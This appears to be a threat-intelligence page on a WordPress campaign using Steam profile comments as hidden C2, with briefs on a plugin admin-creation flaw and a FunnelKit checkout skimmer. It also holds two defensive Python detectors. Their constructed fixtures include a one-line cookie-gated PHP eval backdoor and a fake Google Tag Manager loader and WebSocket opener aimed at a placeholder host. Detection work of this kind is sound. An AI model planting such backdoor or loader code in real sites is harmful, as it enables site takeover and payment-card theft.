ctipilot.ch

WordPress malware abuses Steam profile comments as Unicode-steganography C2 (GoDaddy)

campaign · campaign:wordpress-steam-profile-c2-unicode-steganography

  • Coverage timeline: 1 (first 2026-06-02 → last 2026-06-02)
  • Briefs: 1 (1 distinct)
  • Sources cited: 17 (8 hosts)
  • Sections touched: 1 (research)
  • Co-occurring entities: 2

Story timeline

  1. 2026-06-02 · CTI Daily Brief — 2026-06-02
     research · First coverage. ~2,000 sites; invisible-Unicode-encoded C2 URLs in Steam Community profiles; cookie-auth PHP backdoor.

Where this entity is cited

  • research (1)

Source distribution

  • nvd.nist.gov: 5 (29%)
  • bleepingcomputer.com: 3 (18%)
  • thehackernews.com: 3 (18%)
  • attack.mitre.org: 2 (12%)
  • godaddy.com: 1 (6%)
  • sansec.io: 1 (6%)
  • securityweek.com: 1 (6%)
  • sentinelone.com: 1 (6%)

Items in briefs about WordPress malware abuses Steam profile comments as Unicode-steganography C2 (GoDaddy) (4)

CVE-2026-8732 — WP Maps Pro WordPress plugin: unauthenticated admin-account creation, actively exploited

From CTI Daily Brief — 2026-06-02 · published 2026-06-02

CVE-2026-8732 (CVSS 9.8) lets an unauthenticated attacker create a WordPress administrator account on sites running the WP Maps Pro plugin ≤ 6.1.0 by abusing a publicly disclosed nonce together with a wp_ajax_nopriv_ action handler that fails to enforce capability checks (The Hacker News, 2026-06-01 · BleepingComputer, 2026-05-31). The CVSS 9.8 rating is per The Hacker News. Exploitation is live — Wordfence reported blocking exploitation attempts at scale within 24 hours of disclosure. The fix is in version 6.1.1. Once an attacker holds an admin account, full site takeover (plugin/theme upload → webshell) follows.

GoDaddy documents WordPress malware using Steam profile comments as a Unicode-steganography C2 resolver

From CTI Daily Brief — 2026-06-02 · published 2026-06-02

GoDaddy Security detailed a WordPress malware campaign affecting roughly 2,000 sites that hides its command-and-control resolution inside benign-looking comments on Steam Community profile pages (GoDaddy Security, 2026-05-28 · BleepingComputer, 2026-06-01). The first-stage PHP backdoor on a compromised WordPress install fetches a specific Steam profile and decodes a URL hidden using six invisible Unicode characters (zero-width non-joiner/joiner U+200C/U+200D and the invisible-operator code points U+2061–U+2064), reconstructing a link to a malicious JavaScript file disguised as a legitimate library. A second-stage PHP backdoor then accepts base64-encoded PHP via cookie-authenticated HTTP POST, giving persistent arbitrary code execution. Initial access was traced to stolen FTP/SFTP credentials, vulnerable plugins/themes and supply-chain compromise.

Why it matters to us: Steam Community is allowlisted by most web proxies, so the C2 channel is effectively unblockable at the egress filter — defenders must detect at the host. Hunt for PHP files under wp-content/uploads containing @eval(base64_decode(...)), web-server processes issuing outbound requests to steamcommunity.com profile pages, and cookie-authenticated POSTs to .php endpoints. WordPress backs many Swiss municipal and cantonal sites; credential hygiene on FTP/SFTP and plugin patching are the front-line controls.
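An added detection helper (not GoDaddy's or the brief's code) for the two host-side hunts above: it flags runs of the six invisible code points the write-up names inside fetched profile text, and flags PHP source that combines eval(base64_decode(...)) with cookie/POST input. The sample comment and PHP snippet are constructed, and the campaign's actual hidden-URL encoding scheme is not reproduced here.

```python
import re

# The six code points the write-up names as carriers (U+200C/U+200D, U+2061..U+2064).
# The campaign's exact bit-encoding is not reproduced here: this flags their presence only.
INVISIBLE = {0x200C, 0x200D, 0x2061, 0x2062, 0x2063, 0x2064}

def invisible_runs(text, min_len=8):
    """Return (offset, length, histogram) for every run of >= min_len invisible code points.

    Legitimate text rarely contains more than one or two joiners in a row, so a long run
    made only of these characters in a profile comment is a strong host-side indicator."""
    runs, i, n = [], 0, len(text)
    while i < n:
        if ord(text[i]) not in INVISIBLE:
            i += 1
            continue
        j = i
        while j < n and ord(text[j]) in INVISIBLE:
            j += 1
        if j - i >= min_len:
            hist = {}
            for ch in text[i:j]:
                key = f"U+{ord(ch):04X}"
                hist[key] = hist.get(key, 0) + 1
            runs.append((i, j - i, hist))
        i = j
    return runs

# Second-stage pattern from the brief: base64-encoded PHP evaluated from cookie/POST input.
EVAL_B64_RE = re.compile(r"@?eval\s*\(\s*base64_decode\s*\(", re.IGNORECASE)
REQUEST_INPUT_RE = re.compile(r"\$_(COOKIE|POST)\s*\[", re.IGNORECASE)

def scan_php(source):
    """Classify a PHP file (e.g. one found under wp-content/uploads) by the markers above."""
    return {
        "eval_b64": bool(EVAL_B64_RE.search(source)),
        "cookie_or_post": bool(REQUEST_INPUT_RE.search(source)),
    }

# Constructed samples (not real campaign artefacts): a chatty comment hiding a 24-character
# invisible run, and a one-line cookie-gated eval backdoor.
SAMPLE_COMMENT = "nice profile, gg!" + "\u200c\u200d\u2061\u2062\u2063\u2064" * 4 + " add me"
SAMPLE_PHP = "<?php if(isset($_COOKIE['k'])){@eval(base64_decode($_POST['d']));} ?>"

if __name__ == "__main__":
    for offset, length, hist in invisible_runs(SAMPLE_COMMENT):
        print(f"hidden run at offset {offset}, {length} code points: {hist}")
    print(scan_php(SAMPLE_PHP))
```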

WordPress retail / e-commerce

From CTI Weekly Summary — 2026-W20 (May 11 – May 17, 2026) · published 2026-05-17

FunnelKit "Funnel Builder for WooCommerce" actively exploited as a Magecart skimmer on 40,000+ WordPress stores (daily 2026-05-17), no CVE assigned. The operational pattern (Magecart abuse of a popular WooCommerce plugin) is portable across the WordPress + WooCommerce e-commerce ecosystem used by Swiss / EU SMB retailers; SOC managers serving SMB or municipal e-commerce estates should sweep deployed WooCommerce plugin inventories for the affected FunnelKit version and audit checkout-page DOM for injected payment-form-skimming scripts.

FunnelKit "Funnel Builder for WooCommerce" actively exploited as Magecart skimmer on 40,000+ WordPress stores — no CVE assigned

From CTI Daily Brief — 2026-05-17 · published 2026-05-17

Sansec published primary research on 2026-05-14 documenting active exploitation of an unauthenticated code-injection flaw in FunnelKit's Funnel Builder for WooCommerce plugin, with BleepingComputer corroborating on 2026-05-15 and The Hacker News expanding on 2026-05-16 (Sansec, 2026-05-14; BleepingComputer, 2026-05-15; The Hacker News, 2026-05-16). The vulnerable component is a publicly exposed POST endpoint for checkout-funnel session management that fails to validate caller permissions — per The Hacker News's coverage of Sansec's research, "Funnel Builder includes a publicly exposed checkout endpoint that allows an incoming request to choose the type of internal method to run". An unauthenticated request can invoke the internal method responsible for writing the plugin's global settings and inject arbitrary content into the External Scripts field (Settings > Checkout > External Scripts), which then executes on every checkout page site-wide. Mapped to T1190 Exploit Public-Facing Application + T1505.003 Web-Shell-equivalent (Magecart variant). Sansec observed the live payload masquerading as a Google Tag Manager initialiser; the fake GTM loader pulls JavaScript from an attacker-controlled domain, opens a WebSocket to attacker C2, and retrieves a storefront-tailored skimmer that harvests credit-card numbers, CVVs, and billing data in real time during checkout. No CVE has been assigned. Affected: all FunnelKit Funnel Builder for WooCommerce versions before v3.15.0.3.

Why it matters to us: the unauthenticated-write-to-plugin-settings pattern is increasingly common across WordPress commerce plugins and is reachable by any internet scanner — Swiss/EU cantonal e-service portals, healthcare patient-payment systems, and university e-commerce instances running WooCommerce are exposed without operator action. The WebSocket-to-attacker-C2 channel makes the skimmer payload polymorphic per victim, so static-IOC scanning of checkout HTML will miss it; defenders should audit wp_options for unrecognised funnel-builder external-script entries and alert on any WebSocket (wss://) connection initiated from a WordPress PHP process or visible in browser checkout traffic to non-CDN endpoints. Hardening: update to v3.15.0.3+ immediately; manually purge the External Scripts setting; deploy a server-side malware scanner against the plugin install path. Three independent corroborating sources clear the SINGLE-SOURCE rule.
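As an added example (not Sansec's or the brief's code), the checkout-page audit both FunnelKit items above call for: it lists scripts that load from hosts outside an operator allowlist, inline loaders that mimic a GTM initialiser but fetch from elsewhere, and any wss:// endpoint referenced in page scripts. The allowlist, the .invalid hostnames and the sample HTML are constructed.

```python
import re
from urllib.parse import urlparse

# Constructed allowlist: hosts this shop expects to serve checkout-page scripts from.
ALLOWED_HOSTS = {"www.googletagmanager.com", "shop.example.ch"}

SCRIPT_RE = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.DOTALL | re.IGNORECASE)
SRC_RE = re.compile(r"""src\s*=\s*["']([^"']+)["']""", re.IGNORECASE)
URL_RE = re.compile(r"""(?:https?|wss?)://[^\s"'<>]+""", re.IGNORECASE)

def audit_checkout_html(html):
    """Return (reason, evidence) findings for scripts that do not belong on a checkout page."""
    findings = []
    for attrs, body in SCRIPT_RE.findall(html):
        src = SRC_RE.search(attrs)
        if src:
            host = urlparse(src.group(1)).hostname or ""
            if host and host not in ALLOWED_HOSTS:
                findings.append(("external script from unlisted host", src.group(1)))
        looks_like_gtm = "gtm" in body.lower() or "dataLayer" in body
        for url in URL_RE.findall(body):
            if url.lower().startswith("ws"):
                # Sansec's skimmer fetched a per-victim payload over a WebSocket to attacker C2.
                findings.append(("WebSocket endpoint in checkout script", url))
                continue
            host = urlparse(url).hostname or ""
            if host and host not in ALLOWED_HOSTS:
                # The observed payload posed as a GTM initialiser but loaded from elsewhere.
                reason = "fake-GTM style loader" if looks_like_gtm else "inline loader to unlisted host"
                findings.append((reason, url))
    return findings

# Constructed checkout page: one genuine GTM snippet, one lookalike pointing off-site,
# the shop's own script, an injected external script, and an inline WebSocket opener.
SAMPLE_HTML = """<html><body>
<script>(function(w,d,s,l,i){w[l]=w[l]||[];var j=d.createElement(s);
j.src='https://www.googletagmanager.com/gtm.js?id='+i;d.head.appendChild(j);})(window,document,'script','dataLayer','GTM-PLACEHOLDER');</script>
<script>(function(){window.dataLayer=window.dataLayer||[];var j=document.createElement('script');
j.src='https://cdn-static.invalid/gtm.js';document.head.appendChild(j);})();</script>
<script src="https://shop.example.ch/wp-content/plugins/woocommerce/assets/js/checkout.js"></script>
<script src="https://cdn-static.invalid/lib.js"></script>
<script>var ws=new WebSocket('wss://cdn-static.invalid/ws');</script>
</body></html>"""

if __name__ == "__main__":
    for reason, evidence in audit_checkout_html(SAMPLE_HTML):
        print(f"{reason}: {evidence}")
```

Run it against a saved copy of the live checkout page after each plugin update; any finding against a host you did not add to the allowlist is worth a look at the External Scripts setting.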